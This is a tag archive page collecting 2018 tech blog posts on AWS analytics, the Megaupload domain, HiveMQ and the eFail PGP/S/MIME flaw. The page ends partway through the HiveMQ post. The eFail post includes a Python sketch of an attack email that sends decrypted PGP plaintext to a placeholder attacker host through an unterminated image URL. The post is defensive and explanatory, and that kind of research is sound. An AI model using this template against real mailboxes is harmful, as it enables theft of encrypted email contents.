Tag Archives: Sessions

[$] Network filesystem topics

Post Syndicated from jake original https://lwn.net/Articles/754506/rss

At the 2018 Linux Storage, Filesystem, and
Memory-Management Summit (LSFMM), Steve French led a discussion of various
problem areas for network filesystems. Unlike previous sessions (in 2016 and 2017), there was some good news to report
because the long-awaited statx()
system call
was released in Linux 4.11. But there
is still plenty of work to be done to better support network filesystems in
Linux.

Connect, collaborate, and learn at AWS Global Summits in 2018

Post Syndicated from Tina Kelleher original https://aws.amazon.com/blogs/big-data/connect-collaborate-and-learn-at-aws-global-summits-in-2018/

Regardless of your career path, there’s no denying that attending industry events can provide helpful career development opportunities — not only for improving and expanding your skill sets, but for networking as well. According to this article from PayScale.com, experts estimate that somewhere between 70-85% of new positions are landed through networking.

If you want to narrow that focus to networking with cloud computing professionals who are tackling some of today’s most innovative and exciting big data solutions, the big data-focused sessions at an AWS Global Summit are a great place to start.

AWS Global Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. As the name suggests, these summits are held in major cities around the world, and attract technologists from all industries and skill levels who’re interested in hearing from AWS leaders, experts, partners, and customers.

In addition to networking opportunities with top cloud technology providers, consultants and your peers in our Partner and Solutions Expo, you’ll also hone your AWS skills by attending and participating in a multitude of education and training opportunities.

Here’s a brief sampling of some of the upcoming sessions relevant to big data professionals:

May 31st: Big Data Architectural Patterns and Best Practices on AWS | AWS Summit – Mexico City

June 6th-7th: Various (click on the “Big Data & Analytics” header) | AWS Summit – Berlin

June 20th-21st: [email protected] | Public Sector Summit – Washington DC

June 21st: Enabling Self Service for Data Scientists with AWS Service Catalog | AWS Summit – Sao Paulo

Be sure to check out the main page for AWS Global Summits, where you can see which cities have AWS Summits planned for 2018, register to attend an upcoming event, or provide your information to be notified when registration opens for a future event.

Some notes on eFail

Post Syndicated from Robert Graham original https://blog.erratasec.com/2018/05/some-notes-on-efail.html

I’ve been busy trying to replicate the “eFail” PGP/SMIME bug. I thought I’d write up some notes.

PGP and S/MIME encrypt emails, so that eavesdroppers can’t read them. The bugs potentially allow eavesdroppers to take the encrypted emails they’ve captured and resend them to you, reformatted in a way that allows them to decrypt the messages.

Disable remote/external content in email

The most important defense is to disable “external” or “remote” content from being automatically loaded. This is when HTML-formatted emails attempt to load images from remote websites. This happens legitimately when senders want to display images without filling up the email with them. But most of the time it is illegitimate: they hide images in the email in order to track you with unique IDs and cookies. For example, this is the code at the end of an email from politician Bernie Sanders to his supporters. Notice the long random number assigned to track me, and that the width/height of the image is set to one pixel, so you don’t even see it:

Such trackers are so pernicious they are disabled by default in most email clients. This is an example of the settings in Thunderbird:

The problem is that as you read email messages, you often get frustrated by the error messages and missing content, so you keep adding exceptions:

The correct defense against this eFail bug is to make sure such remote content is disabled and that you have no exceptions, or at least, no HTTP exceptions. HTTPS exceptions (those using SSL) are okay as long as they aren’t to a website the attacker controls. Unencrypted exceptions, though, the hacker can eavesdrop on, so it doesn’t matter if they control the website the requests go to. If the attacker can eavesdrop on your emails, they can probably eavesdrop on your HTTP sessions as well.

Some have recommended disabling PGP and S/MIME completely. That’s probably overkill. As long as the attacker can’t use the “remote content” in emails, you are fine. Likewise, some have recommended disabling HTML completely. That’s not even an option in any email client I’ve used — you can disable sending HTML emails, but not receiving them. It’s sufficient to just disable grabbing remote content, not the rest of HTML email rendering.

I couldn’t replicate the direct exfiltration

There are two related bugs. One allows direct exfiltration, which appends the decrypted PGP email onto the end of an IMG tag (like one of those tracking tags), allowing the entire message to be decrypted.

An example of this is the following email. This is a standard HTML email message consisting of multiple parts. The trick is that the IMG tag in the first part starts the URL (blog.robertgraham.com/…) but doesn’t end it. It has the starting quote in front of the URL but no ending quote. The ending quote will be in the next chunk.

The next chunk isn’t HTML, though, it’s PGP. The PGP extension (in my case, Enigmail) will detect this and automatically decrypt it. In this case, it’s a previous email message I’ve received that the attacker captured by eavesdropping and then pasted into this email message in order to get it decrypted.
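
To make the shape of such a message more concrete, here is a minimal sketch built with Python’s standard email package. It only illustrates the multipart structure described above; the addresses, collection URL, and ciphertext are placeholders, and real eFail test messages differ in their details.

# Illustrative only: a multipart/mixed message whose first HTML part opens an
# <img src="... attribute without closing the quote, followed by a captured
# PGP message that the victim's mail client will decrypt inline.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart("mixed")
msg["From"] = "attacker@example.com"   # placeholder addresses
msg["To"] = "victim@example.com"
msg["Subject"] = "efail test"

# Part 1: HTML with an unterminated src attribute (no closing quote).
msg.attach(MIMEText('<img src="http://attacker.example.com/collect?d=', "html"))

# Part 2: a previously captured PGP message pasted in verbatim, so that the
# victim's PGP plugin decrypts it and the plaintext gets swallowed into the
# still-open src attribute when the HTML is reassembled.
captured = """-----BEGIN PGP MESSAGE-----
...captured ciphertext goes here...
-----END PGP MESSAGE-----"""
msg.attach(MIMEText(captured, "plain"))

print(msg.as_string())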

What should happen at this point is that Thunderbird will generate a request (if “remote content” is enabled) to the blog.robertgraham.com server with the decrypted contents of the PGP email appended to it. But that’s not what happens. Instead, I get this:

I am indeed getting weird stuff in the URL (the bit after the GET /), but it’s not the PGP decrypted message. Instead what’s going on is that when Thunderbird puts together a “multipart/mixed” message, it adds its own HTML tags consisting of lines between each part. In the email client it looks like this:

The HTML code it adds looks like:

That’s what you see in the above URL: all of this code up to the first quote. That quote terminates the unclosed quote in the URL from the first multipart section, causing the rest of the content to be ignored (as far as being sent as part of the URL goes).

So at least for the latest version of Thunderbird, you are accidentally safe, even if you have “remote content” enabled. Though this is only according to my tests; there may be a workaround that hackers could exploit.

STARTTLS

In the old days, email was sent plaintext over the wire so that it could be passively eavesdropped on. Nowadays, most providers send it via “STARTTLS”, which sorta encrypts it. Attackers can still intercept such email, but they have to do so actively, using man-in-the-middle. Such active techniques can be detected if you are careful and look for them.
Some organizations don’t care. Apparently, some nation states are just blocking all STARTTLS and forcing email to be sent unencrypted. Others do care. The NSA will passively sniff all the email they can in nations like Iraq, but they won’t actively intercept STARTTLS messages, for fear of getting caught.
The consequence is that it’s much less likely that somebody has been eavesdropping on you, passively grabbing all your PGP/SMIME emails. If you fear they have been, you should look (e.g. send emails from GMail and see if they are intercepted by sniffing the wire).

You’ll know if you are getting hacked

If somebody attacks you using eFail, you’ll know. You’ll get an email message formatted this way, with multipart/mixed components, some with corrupt HTML, some encrypted via PGP. This means that for the most part, your risk is that you’ll be attacked only once — the hacker will only be able to get one message through and decrypt it before you notice that something is amiss. Though to be fair, they can probably include all the emails they want decrypted as attachments to the single email they sent you, so the risk isn’t necessarily that you’ll only get one decrypted.
As mentioned above, a lot of attackers (e.g. the NSA) won’t attack you if it’s so easy to get caught. Other attackers, though, like anonymous hackers, don’t care.
Somebody ought to write a plugin to Thunderbird to detect this.

Summary

  • It only works if attackers have already captured your emails (though that’s why you use PGP/SMIME in the first place, to guard against that).
  • It only works if you’ve enabled your email client to automatically grab external/remote content.
  • It seems to not be easily reproducible in all cases.
  • Instead of disabling PGP/SMIME, you should make sure your email client has remote/external content disabled — that’s a huge privacy violation even without this bug.

Notes: The default email client on the Mac enables remote content by default, which is bad:

Analyze Apache Parquet optimized data using Amazon Kinesis Data Firehose, Amazon Athena, and Amazon Redshift

Post Syndicated from Roy Hasson original https://aws.amazon.com/blogs/big-data/analyzing-apache-parquet-optimized-data-using-amazon-kinesis-data-firehose-amazon-athena-and-amazon-redshift/

Amazon Kinesis Data Firehose is the easiest way to capture and stream data into a data lake built on Amazon S3. This data can be anything—from AWS service logs like AWS CloudTrail log files, Amazon VPC Flow Logs, Application Load Balancer logs, and others. It can also be IoT events, game events, and much more. To efficiently query this data, a time-consuming ETL (extract, transform, and load) process is required to massage and convert the data to an optimal file format, which increases the time to insight. This situation is less than ideal, especially for real-time data that loses its value over time.

To solve this common challenge, Kinesis Data Firehose can now save data to Amazon S3 in Apache Parquet or Apache ORC format. These are optimized columnar formats that are highly recommended for best performance and cost-savings when querying data in S3. This feature directly benefits you if you use Amazon Athena, Amazon Redshift, AWS Glue, Amazon EMR, or any other big data tools that are available from the AWS Partner Network and through the open-source community.

Amazon Connect is a simple-to-use, cloud-based contact center service that makes it easy for any business to provide a great customer experience at a lower cost than common alternatives. Its open platform design enables easy integration with other systems. One of those systems is Amazon Kinesis—in particular, Kinesis Data Streams and Kinesis Data Firehose.

What’s really exciting is that you can now save events from Amazon Connect to S3 in Apache Parquet format. You can then perform analytics using Amazon Athena and Amazon Redshift Spectrum in real time, taking advantage of this key performance and cost optimization. Of course, Amazon Connect is only one example. This new capability opens the door for a great deal of opportunity, especially as organizations continue to build their data lakes.

Amazon Connect includes an array of analytics views in the Administrator dashboard. But you might want to run other types of analysis. In this post, I describe how to set up a data stream from Amazon Connect through Kinesis Data Streams and Kinesis Data Firehose and out to S3, and then perform analytics using Athena and Amazon Redshift Spectrum. I focus primarily on the Kinesis Data Firehose support for Parquet and its integration with the AWS Glue Data Catalog, Amazon Athena, and Amazon Redshift.

Solution overview

Here is how the solution is laid out: agent events from Amazon Connect are sent to a Kinesis data stream, Kinesis Data Firehose reads from that stream and converts the events to Parquet as it delivers them to S3, and Athena and Amazon Redshift Spectrum query the data in place.

The following sections walk you through each of these steps to set up the pipeline.

1. Define the schema

When Kinesis Data Firehose processes incoming events and converts the data to Parquet, it needs to know which schema to apply. The reason is that incoming events often contain only some of the expected fields, depending on which values the producers are sending. A typical process is to normalize the schema during a batch ETL job so that you end up with a consistent schema that can easily be understood and queried. Doing this introduces latency because of the nature of the batch process. To overcome this issue, Kinesis Data Firehose requires the schema to be defined in advance.

To see the available columns and structures, see Amazon Connect Agent Event Streams. For simplicity, I opted to make all the columns of type string rather than create the nested structures, but you can definitely do that if you want.

The simplest way to define the schema is to create a table in the Amazon Athena console. Open the Athena console, and paste the following create table statement, substituting your own S3 bucket and prefix for where your event data will be stored. A Data Catalog database is a logical container that holds the different tables that you can create. The default database name shown here should already exist. If it doesn’t, you can create it or use another database that you’ve already created.

CREATE EXTERNAL TABLE default.kfhconnectblog (
  awsaccountid string,
  agentarn string,
  currentagentsnapshot string,
  eventid string,
  eventtimestamp string,
  eventtype string,
  instancearn string,
  previousagentsnapshot string,
  version string
)
STORED AS parquet
LOCATION 's3://your_bucket/kfhconnectblog/'
TBLPROPERTIES ("parquet.compression"="SNAPPY")

That’s all you have to do to prepare the schema for Kinesis Data Firehose.
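
If you prefer scripting this step instead of using the console, the same DDL can be submitted through the Athena API. Here is a hedged sketch using boto3; the region and the query-results location are assumptions you would replace with your own.

import boto3

athena = boto3.client("athena", region_name="us-east-1")  # region is an assumption

ddl = """
CREATE EXTERNAL TABLE default.kfhconnectblog (
  awsaccountid string,
  agentarn string,
  currentagentsnapshot string,
  eventid string,
  eventtimestamp string,
  eventtype string,
  instancearn string,
  previousagentsnapshot string,
  version string
)
STORED AS parquet
LOCATION 's3://your_bucket/kfhconnectblog/'
TBLPROPERTIES ("parquet.compression"="SNAPPY")
"""

# Athena writes query results (even for DDL statements) to an S3 location of your choosing.
response = athena.start_query_execution(
    QueryString=ddl,
    ResultConfiguration={"OutputLocation": "s3://your_bucket/athena-results/"},
)
print(response["QueryExecutionId"])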

2. Define the data streams

Next, you need to define the Kinesis data streams that will be used to stream the Amazon Connect events.  Open the Kinesis Data Streams console and create two streams.  You can configure them with only one shard each because you don’t have a lot of data right now.
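
If you would rather create the streams programmatically, a minimal boto3 sketch looks roughly like this; the stream names and region are made up for the example.

import boto3

kinesis = boto3.client("kinesis", region_name="us-east-1")  # region is an assumption

# One shard each is plenty for the small amount of test data in this walkthrough.
stream_names = ("connect-agent-events", "connect-ctr-events")  # placeholder names
for name in stream_names:
    kinesis.create_stream(StreamName=name, ShardCount=1)

# Wait until both streams are ACTIVE before wiring them up in the next steps.
waiter = kinesis.get_waiter("stream_exists")
for name in stream_names:
    waiter.wait(StreamName=name)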

3. Define the Kinesis Data Firehose delivery stream for Parquet

Let’s configure the Data Firehose delivery stream using the data stream as the source and Amazon S3 as the output. Start by opening the Kinesis Data Firehose console and creating a new data delivery stream. Give it a name, and associate it with the Kinesis data stream that you created in Step 2.

As shown in the following screenshot, enable Record format conversion (1) and choose Apache Parquet (2). As you can see, Apache ORC is also supported. Scroll down and provide the AWS Glue Data Catalog database name (3) and table names (4) that you created in Step 1. Choose Next.

To make things easier, the output S3 bucket and prefix fields are automatically populated using the values that you defined in the LOCATION parameter of the create table statement from Step 1. Pretty cool. Additionally, you have the option to save the raw events into another location as defined in the Source record S3 backup section. Don’t forget to add a trailing forward slash “ / “ so that Data Firehose creates the date partitions inside that prefix.

On the next page, in the S3 buffer conditions section, there is a note about configuring a large buffer size. The Parquet file format is highly efficient in how it stores and compresses data. Increasing the buffer size allows you to pack more rows into each output file, which is preferred and gives you the most benefit from Parquet.

Compression using Snappy is automatically enabled for both Parquet and ORC. You can modify the compression algorithm by using the Kinesis Data Firehose API and update the OutputFormatConfiguration.

Be sure to also enable Amazon CloudWatch Logs so that you can debug any issues that you might run into.
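
For reference, here is a hedged sketch of the same delivery stream created through the API with boto3. It shows where the record format conversion, the Glue schema reference, the buffer size, the compression setting inside OutputFormatConfiguration, and the CloudWatch logging options live; the account ID, ARNs, role, and names are placeholders.

import boto3

firehose = boto3.client("firehose", region_name="us-east-1")  # region is an assumption

firehose.create_delivery_stream(
    DeliveryStreamName="kfhconnectblog",
    DeliveryStreamType="KinesisStreamAsSource",
    KinesisStreamSourceConfiguration={
        "KinesisStreamARN": "arn:aws:kinesis:us-east-1:111111111111:stream/connect-agent-events",
        "RoleARN": "arn:aws:iam::111111111111:role/firehose-delivery-role",
    },
    ExtendedS3DestinationConfiguration={
        "RoleARN": "arn:aws:iam::111111111111:role/firehose-delivery-role",
        "BucketARN": "arn:aws:s3:::your_bucket",
        "Prefix": "kfhconnectblog/",  # trailing slash so date partitions land under the prefix
        "BufferingHints": {"SizeInMBs": 128, "IntervalInSeconds": 300},  # large buffer suits Parquet
        "DataFormatConversionConfiguration": {
            "Enabled": True,
            "InputFormatConfiguration": {"Deserializer": {"OpenXJsonSerDe": {}}},
            "OutputFormatConfiguration": {
                # Snappy is the default; change the codec here if you need a different one
                "Serializer": {"ParquetSerDe": {"Compression": "SNAPPY"}}
            },
            "SchemaConfiguration": {
                "DatabaseName": "default",
                "TableName": "kfhconnectblog",
                "RoleARN": "arn:aws:iam::111111111111:role/firehose-delivery-role",
                "Region": "us-east-1",
            },
        },
        "CloudWatchLoggingOptions": {
            "Enabled": True,
            "LogGroupName": "/aws/kinesisfirehose/kfhconnectblog",
            "LogStreamName": "S3Delivery",
        },
    },
)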

Lastly, finalize the creation of the Firehose delivery stream, and continue on to the next section.

4. Set up the Amazon Connect contact center

After setting up the Kinesis pipeline, you now need to set up a simple contact center in Amazon Connect. The Getting Started page provides clear instructions on how to set up your environment, acquire a phone number, and create an agent to accept calls.

After setting up the contact center, in the Amazon Connect console, choose your Instance Alias, and then choose Data Streaming. Under Agent Event, choose the Kinesis data stream that you created in Step 2, and then choose Save.

At this point, your pipeline is complete.  Agent events from Amazon Connect are generated as agents go about their day. Events are sent via Kinesis Data Streams to Kinesis Data Firehose, which converts the event data from JSON to Parquet and stores it in S3. Athena and Amazon Redshift Spectrum can simply query the data without any additional work.

So let’s generate some data. Go back into the Administrator console for your Amazon Connect contact center, and create an agent to handle incoming calls. In this example, I creatively named mine Agent One. After it is created, Agent One can get to work and log into their console and set their availability to Available so that they are ready to receive calls.

To make the data a bit more interesting, I also created a second agent, Agent Two. I then made some incoming and outgoing calls and caused some failures to occur, so I now have enough data available to analyze.

5. Analyze the data with Athena

Let’s open the Athena console and run some queries. One thing you’ll notice is that when we created the schema for the dataset, we defined some of the fields as strings even though in the documentation they are complex structures.  The reason for doing that was simply to show some of the flexibility of Athena in parsing JSON data. However, you can define nested structures in your table schema so that Kinesis Data Firehose applies the appropriate schema to the Parquet file.

Let’s run the first query to see which agents have logged into the system.

The query might look complex, but it’s fairly straightforward:

WITH dataset AS (
  SELECT 
    from_iso8601_timestamp(eventtimestamp) AS event_ts,
    eventtype,
    -- CURRENT STATE
    json_extract_scalar(
      currentagentsnapshot,
      '$.agentstatus.name') AS current_status,
    from_iso8601_timestamp(
      json_extract_scalar(
        currentagentsnapshot,
        '$.agentstatus.starttimestamp')) AS current_starttimestamp,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.firstname') AS current_firstname,
    json_extract_scalar(
      currentagentsnapshot,
      '$.configuration.lastname') AS current_lastname,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.username') AS current_username,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.routingprofile.defaultoutboundqueue.name') AS current_outboundqueue,
    json_extract_scalar(
      currentagentsnapshot, 
      '$.configuration.routingprofile.inboundqueues[0].name') as current_inboundqueue,
    -- PREVIOUS STATE
    json_extract_scalar(
      previousagentsnapshot, 
      '$.agentstatus.name') as prev_status,
    from_iso8601_timestamp(
      json_extract_scalar(
        previousagentsnapshot, 
       '$.agentstatus.starttimestamp')) as prev_starttimestamp,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.firstname') as prev_firstname,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.lastname') as prev_lastname,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.username') as prev_username,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.routingprofile.defaultoutboundqueue.name') as prev_outboundqueue,
    json_extract_scalar(
      previousagentsnapshot, 
      '$.configuration.routingprofile.inboundqueues[0].name') as prev_inboundqueue
  from kfhconnectblog
  where eventtype <> 'HEART_BEAT'
)
SELECT
  current_status as status,
  current_username as username,
  event_ts
FROM dataset
WHERE eventtype = 'LOGIN' AND current_username <> ''
ORDER BY event_ts DESC

The query output looks something like this:

Here is another query that shows the sessions each of the agents engaged in. It tells us whether the calls were incoming or outgoing, whether they were completed, and whether there were missed or failed calls.

WITH src AS (
  SELECT
     eventid,
     json_extract_scalar(currentagentsnapshot, '$.configuration.username') as username,
     cast(json_extract(currentagentsnapshot, '$.contacts') AS ARRAY(JSON)) as c,
     cast(json_extract(previousagentsnapshot, '$.contacts') AS ARRAY(JSON)) as p
  from kfhconnectblog
),
src2 AS (
  SELECT *
  FROM src CROSS JOIN UNNEST (c, p) AS contacts(c_item, p_item)
),
dataset AS (
SELECT 
  eventid,
  username,
  json_extract_scalar(c_item, '$.contactid') as c_contactid,
  json_extract_scalar(c_item, '$.channel') as c_channel,
  json_extract_scalar(c_item, '$.initiationmethod') as c_direction,
  json_extract_scalar(c_item, '$.queue.name') as c_queue,
  json_extract_scalar(c_item, '$.state') as c_state,
  from_iso8601_timestamp(json_extract_scalar(c_item, '$.statestarttimestamp')) as c_ts,
  
  json_extract_scalar(p_item, '$.contactid') as p_contactid,
  json_extract_scalar(p_item, '$.channel') as p_channel,
  json_extract_scalar(p_item, '$.initiationmethod') as p_direction,
  json_extract_scalar(p_item, '$.queue.name') as p_queue,
  json_extract_scalar(p_item, '$.state') as p_state,
  from_iso8601_timestamp(json_extract_scalar(p_item, '$.statestarttimestamp')) as p_ts
FROM src2
)
SELECT 
  username,
  c_channel as channel,
  c_direction as direction,
  p_state as prev_state,
  c_state as current_state,
  c_ts as current_ts,
  c_contactid as id
FROM dataset
WHERE c_contactid = p_contactid
ORDER BY id DESC, current_ts ASC

The query output looks similar to the following:

6. Analyze the data with Amazon Redshift Spectrum

With Amazon Redshift Spectrum, you can query data directly in S3 using your existing Amazon Redshift data warehouse cluster. Because the data is already in Parquet format, Redshift Spectrum gets the same great benefits that Athena does.
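
To let Redshift Spectrum see the table, you first create an external schema in Amazon Redshift that points at the AWS Glue Data Catalog database used earlier. Here is a hedged sketch of that one-time setup, issued through Python with the psycopg2 driver; the cluster endpoint, credentials, and IAM role ARN are placeholders, and pasting the DDL into any SQL client works just as well.

import psycopg2  # assumes the psycopg2 driver; any Redshift-compatible client works

# Connection details are placeholders for your own cluster.
conn = psycopg2.connect(
    host="your-cluster.abc123.us-east-1.redshift.amazonaws.com",
    port=5439,
    dbname="dev",
    user="awsuser",
    password="your_password",
)
conn.autocommit = True

# Map the Glue Data Catalog database that holds kfhconnectblog into Redshift
# as "default_schema", so Redshift Spectrum can query the Parquet files in S3.
create_schema = """
CREATE EXTERNAL SCHEMA IF NOT EXISTS default_schema
FROM DATA CATALOG
DATABASE 'default'
IAM_ROLE 'arn:aws:iam::111111111111:role/redshift-spectrum-role'
"""

with conn.cursor() as cur:
    cur.execute(create_schema)
conn.close()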

Here is a simple query that shows querying the same data from Amazon Redshift. Note that to do this, you first need to create an external schema in Amazon Redshift that points to the AWS Glue Data Catalog, as sketched above.

SELECT 
  eventtype,
  json_extract_path_text(currentagentsnapshot,'agentstatus','name') AS current_status,
  json_extract_path_text(currentagentsnapshot, 'configuration','firstname') AS current_firstname,
  json_extract_path_text(currentagentsnapshot, 'configuration','lastname') AS current_lastname,
  json_extract_path_text(
    currentagentsnapshot,
    'configuration','routingprofile','defaultoutboundqueue','name') AS current_outboundqueue
FROM default_schema.kfhconnectblog

The following shows the query output:

Summary

In this post, I showed you how to use Kinesis Data Firehose to ingest and convert data to columnar file format, enabling real-time analysis using Athena and Amazon Redshift. This great feature enables a level of optimization in both cost and performance that you need when storing and analyzing large amounts of data. This feature is equally important if you are investing in building data lakes on AWS.

 


Additional Reading

If you found this post useful, be sure to check out Analyzing VPC Flow Logs with Amazon Kinesis Firehose, Amazon Athena, and Amazon QuickSight and Work with partitioned data in AWS Glue.


About the Author

Roy Hasson is a Global Business Development Manager for AWS Analytics. He works with customers around the globe to design solutions to meet their data processing, analytics, and business intelligence needs. Roy is a big Manchester United fan, cheering his team on and hanging out with his family.

Iconic Megaupload.com Domain Has a New Owner

Post Syndicated from Ernesto original https://torrentfreak.com/iconic-megaupload-com-domain-has-a-new-owner-180509/

Following the 2012 raid on Megaupload and Kim Dotcom, U.S. and New Zealand authorities seized millions of dollars in cash and other property, located around the world.

Claiming the assets were obtained through copyright and money laundering crimes, the U.S. government launched separate civil cases in which it asked the court to forfeit a wide variety of seized possessions of the Megaupload defendants.

One of these cases was lost after the U.S. branded Dotcom and his colleagues as “fugitives”. The defense team appealed the ruling, but lost again, and a subsequent petition at the Supreme Court was denied.

As a result, Dotcom had to leave behind several bank accounts and servers, as well as all hope of getting some of his dearly treasured domain names back. This includes the most valuable domain of all, Megaupload.com.

The forfeiture was made final earlier this year but since then little was known about the fate of the domain names. This week, however, it became clear that the US Government didn’t plan to hold on to it, as Megaupload.com now has a new owner.

According to the latest Whois information, which was updated late last week, RegistrarAds Inc is now the official owner of Megaupload.com. The previous owner was Megaupload Limited, under FBI control.

New owner

RegistrarAds is a company based in Vancouver, Washington, which specializes in buying domain names. While we could not find a corporate website, the web is littered with domain disputes and other references to domain name issues.

Michelin North America, for example, successfully filed a complaint against RegistrarAds for registering the michelin-group.com domain. Similarly, the California Milk Processor Board, most famous for its Got Milk? ads, won a WIPO domain dispute over gotpuremilk.com.

How RegistrarAds obtained the Megaupload domain name isn’t entirely clear. It wasn’t dropped by the registry, but it may have been scooped up in an auction. Theoretically, the US Government could have sold it too, but we see no evidence of that.

It’s also unknown what the company’s plans are for Megaupload.com. However, given the company’s track record it’s unlikely that it will do anything file-sharing related. The domain hasn’t updated its nameservers yet and remains unreachable at the time of writing.

TorrentFreak reached out to RegistrarAds, hoping to find out more, but we have yet to hear back.

Megaupload.com is not the only domain that changed owners recently. The same happened to Megaclick.com, which is now registered to Buydomains.com. Several of the other seized Megaupload domain names remain in possession of US authorities, for now.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

AWS Online Tech Talks – May and Early June 2018

Post Syndicated from Devin Watson original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-may-and-early-june-2018/


Join us this month to learn about some of the exciting new services and solution best practices at AWS. We also have our first re:Invent 2018 webinar series, “How to re:Invent”. Sign up now to learn more; we look forward to seeing you.

Note – All sessions are free and in Pacific Time.

Tech talks featured this month:

Analytics & Big Data

May 21, 2018 | 11:00 AM – 11:45 AM PT Integrating Amazon Elasticsearch with your DevOps Tooling – Learn how you can easily integrate Amazon Elasticsearch Service into your DevOps tooling and gain valuable insight from your log data.

May 23, 2018 | 11:00 AM – 11:45 AM PT – Data Warehousing and Data Lake Analytics, Together – Learn how to query data across your data warehouse and data lake without moving data.

May 24, 2018 | 11:00 AM – 11:45 AM PT – Data Transformation Patterns in AWS – Discover how to perform common data transformations on the AWS Data Lake.

Compute

May 29, 2018 | 01:00 PM – 01:45 PM PT – Creating and Managing a WordPress Website with Amazon Lightsail – Learn about Amazon Lightsail and how you can create, run and manage your WordPress websites with Amazon’s simple compute platform.

May 30, 2018 | 01:00 PM – 01:45 PM PT – Accelerating Life Sciences with HPC on AWS – Learn how you can accelerate your Life Sciences research workloads by harnessing the power of high performance computing on AWS.

Containers

May 24, 2018 | 01:00 PM – 01:45 PM PT – Building Microservices with the 12 Factor App Pattern on AWS – Learn best practices for building containerized microservices on AWS, and how traditional software design patterns evolve in the context of containers.

Databases

May 21, 2018 | 01:00 PM – 01:45 PM PT – How to Migrate from Cassandra to Amazon DynamoDB – Get the benefits, best practices and guides on how to migrate your Cassandra databases to Amazon DynamoDB.

May 23, 2018 | 01:00 PM – 01:45 PM PT – 5 Hacks for Optimizing MySQL in the Cloud – Learn how to optimize your MySQL databases for high availability, performance, and disaster resilience using RDS.

DevOps

May 23, 2018 | 09:00 AM – 09:45 AM PT – .NET Serverless Development on AWS – Learn how to build a modern serverless application in .NET Core 2.0.

Enterprise & Hybrid

May 22, 2018 | 11:00 AM – 11:45 AM PT – Hybrid Cloud Customer Use Cases on AWS – Learn how customers are leveraging AWS hybrid cloud capabilities to easily extend their datacenter capacity, deliver new services and applications, and ensure business continuity and disaster recovery.

IoT

May 31, 2018 | 11:00 AM – 11:45 AM PT – Using AWS IoT for Industrial Applications – Discover how you can quickly onboard your fleet of connected devices, keep them secure, and build predictive analytics with AWS IoT.

Machine Learning

May 22, 2018 | 09:00 AM – 09:45 AM PT – Using Apache Spark with Amazon SageMaker – Discover how to use Apache Spark with Amazon SageMaker for training jobs and application integration.

May 24, 2018 | 09:00 AM – 09:45 AM PT – Introducing AWS DeepLens – Learn how AWS DeepLens provides a new way for developers to learn machine learning by pairing the physical device with a broad set of tutorials, examples, source code, and integration with familiar AWS services.

Management Tools

May 21, 2018 | 09:00 AM – 09:45 AM PT – Gaining Better Observability of Your VMs with Amazon CloudWatch – Learn how CloudWatch Agent makes it easy for customers like Rackspace to monitor their VMs.

Mobile

May 29, 2018 | 11:00 AM – 11:45 AM PT – Deep Dive on Amazon Pinpoint Segmentation and Endpoint Management – See how segmentation and endpoint management with Amazon Pinpoint can help you target the right audience.

Networking

May 31, 2018 | 09:00 AM – 09:45 AM PT – Making Private Connectivity the New Norm via AWS PrivateLink – See how PrivateLink enables service owners to offer private endpoints to customers outside their company.

Security, Identity, & Compliance

May 30, 2018 | 09:00 AM – 09:45 AM PT – Introducing AWS Certificate Manager Private Certificate Authority (CA) – Learn how AWS Certificate Manager (ACM) Private Certificate Authority (CA), a managed private CA service, helps you easily and securely manage the lifecycle of your private certificates.

June 1, 2018 | 09:00 AM – 09:45 AM PT – Introducing AWS Firewall Manager – Centrally configure and manage AWS WAF rules across your accounts and applications.

Serverless

May 22, 2018 | 01:00 PM – 01:45 PM PT – Building API-Driven Microservices with Amazon API Gateway – Learn how to build a secure, scalable API for your application in our tech talk about API-driven microservices.

Storage

May 30, 2018 | 11:00 AM – 11:45 AM PT – Accelerate Productivity by Computing at the Edge – Learn how AWS Snowball Edge support for compute instances helps accelerate data transfers, execute custom applications, and reduce overall storage costs.

June 1, 2018 | 11:00 AM – 11:45 AM PT – Learn to Build a Cloud-Scale Website Powered by Amazon EFS – Technical deep dive where you’ll learn tips and tricks for integrating WordPress, Drupal and Magento with Amazon EFS.

 
What’s new in HiveMQ 3.4

Post Syndicated from The HiveMQ Team original https://www.hivemq.com/whats-new-in-hivemq-3-4

We are pleased to announce the release of HiveMQ 3.4. This version of HiveMQ is the most resilient and advanced version of HiveMQ ever. The main focus of this release was on addressing the needs of the most ambitious MQTT deployments in the world: maximum performance and resilience for millions of concurrent MQTT clients. Of course, deployments of all sizes can profit from the improvements in the latest and greatest HiveMQ.

This version is a drop-in replacement for HiveMQ 3.3 and of course supports rolling upgrades with zero-downtime.

HiveMQ 3.4 brings many features that your users, administrators and plugin developers are going to love. These are the highlights:

 

New HiveMQ 3.4 features at a glance

Cluster

HiveMQ 3.4 brings various improvements in terms of scalability, availability, resilience and observability for the cluster mechanism. Many of the new features remain under the hood, but several additions stand out:

Cluster Overload Protection

The new version has a first-of-its-kind Cluster Overload Protection. The whole cluster is able to spot MQTT clients that cause overload on nodes or the cluster as a whole and protects itself from the overload. This mechanism also protects the deployment from cascading failures due to slow or failing underlying hardware (as sometimes seen on cloud providers). This feature is enabled by default and you can learn more about the mechanism in our documentation.

Dynamic Replicates

HiveMQ’s sophisticated cluster mechanism is able to scale in a linear fashion due to extremely efficient and true data distribution mechanics based on a configured replication factor. The most important aspect of every cluster is availability, which is achieved by having eventual consistency functions in place for edge cases. The 3.4 version adds dynamic replicates to the cluster so even the most challenging edge cases involving network splits don’t lead to the sacrifice of consistency for the most important MQTT operations.

Node Stress Level Metrics

All MQTT cluster nodes are now aware of their own stress level and the stress levels of other cluster members. While all stress mitigation is handled internally by HiveMQ, experienced operators may want to monitor the individual node’s stress level (e.g. with Grafana) in order to start investigating what caused the increase of load.

WebUI

Operators worldwide love the HiveMQ WebUI introduced with HiveMQ 3.3. We gathered all the fantastic feedback from our users and polished the WebUI, so it’s even more useful for day-to-day broker operations and remote debugging of MQTT clients. The most important changes and additions are:

Trace Recording Download

